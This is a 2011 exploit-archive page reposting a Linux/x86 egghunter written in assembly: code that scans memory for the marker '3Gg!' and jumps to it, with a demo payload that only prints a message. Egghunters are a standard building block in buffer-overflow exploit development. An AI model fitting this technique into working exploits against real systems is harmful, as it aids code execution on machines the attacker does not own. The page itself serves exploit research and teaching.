首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux x86 egghunt shellcode
来源:vfocus.net 作者:Raheem 发布时间:2011-07-22  

/*
Exploit Title: Linux/x86 egghunt shellcode
Date: 21-07-2011
Author: Ali Raheem
Tested on:
Linux Ali-PC.home 2.6.38.8-35.fc15.x86_64 #1 SMP Wed Jul 6 13:58:54 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Linux injustice 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:05:41 UTC 2011 i686 i686 i386 GNU/Linux
http://codepad.org/tkSONxY5 Code pad lets you execute code live check here for a live demostration
Thanks: Stealth- for testing and codepad.com for being so useful.
[ali@Ali-PC asm]$ cat egghunter.s
section .data
 egg equ "3Gg!" ;this is the egg marker
section .text
 global _start
_start:
 mov eax, _start ;0x8048080 is a good safe starting point
_next:
 inc eax
_isEgg:
 cmp dword [eax-4],egg
 jne _next
 cmp eax,ebx
 jmp eax
*/
section .data
 msg db "We found the egg!",0ah,0dh
 msg_len equ $-msg
 egg equ "3Gg!"
section .text
 global _start
;This simple egg will print msg if we find it
_egg:
 db "3Gg!"                  ;Start your egg with this marker
 mov eax,4
 mov ebx,1
 mov ecx,msg
 mov edx,msg_len
 int 80h
 mov eax,1
 int 80h
_start:
 mov eax, 0x8048080
_next:
 inc eax
_isEgg:
 cmp dword [eax-4],egg ;is this our marker?
 jne _next                   ;No? skip
 cmp eax,ebx                 ;Make sure JNE is not true if we found our self
 jmp eax                     ;Execute the egg

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dell IT Assistant detectIESett
·Ciscokits 1.0 TFTP Denial Of S
·Microsoft Internet Explorer to
·win32/ 7 sp1 MessageBox
·Win32 / Windows7 Sp1 - rename
·Freefloat FTP 1.0 ABOR Exploit
·Kingsoft AntiVirus 2012 KisKrn
·FreeFloat FTP Server ACCL Buff
·ExtCalendar2 (Auth Bypass/Cook
·Lotus Domino SMTP router, EMAI
·Download Accelerator plus (DAP
·FreeFloat FTP Server REST Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved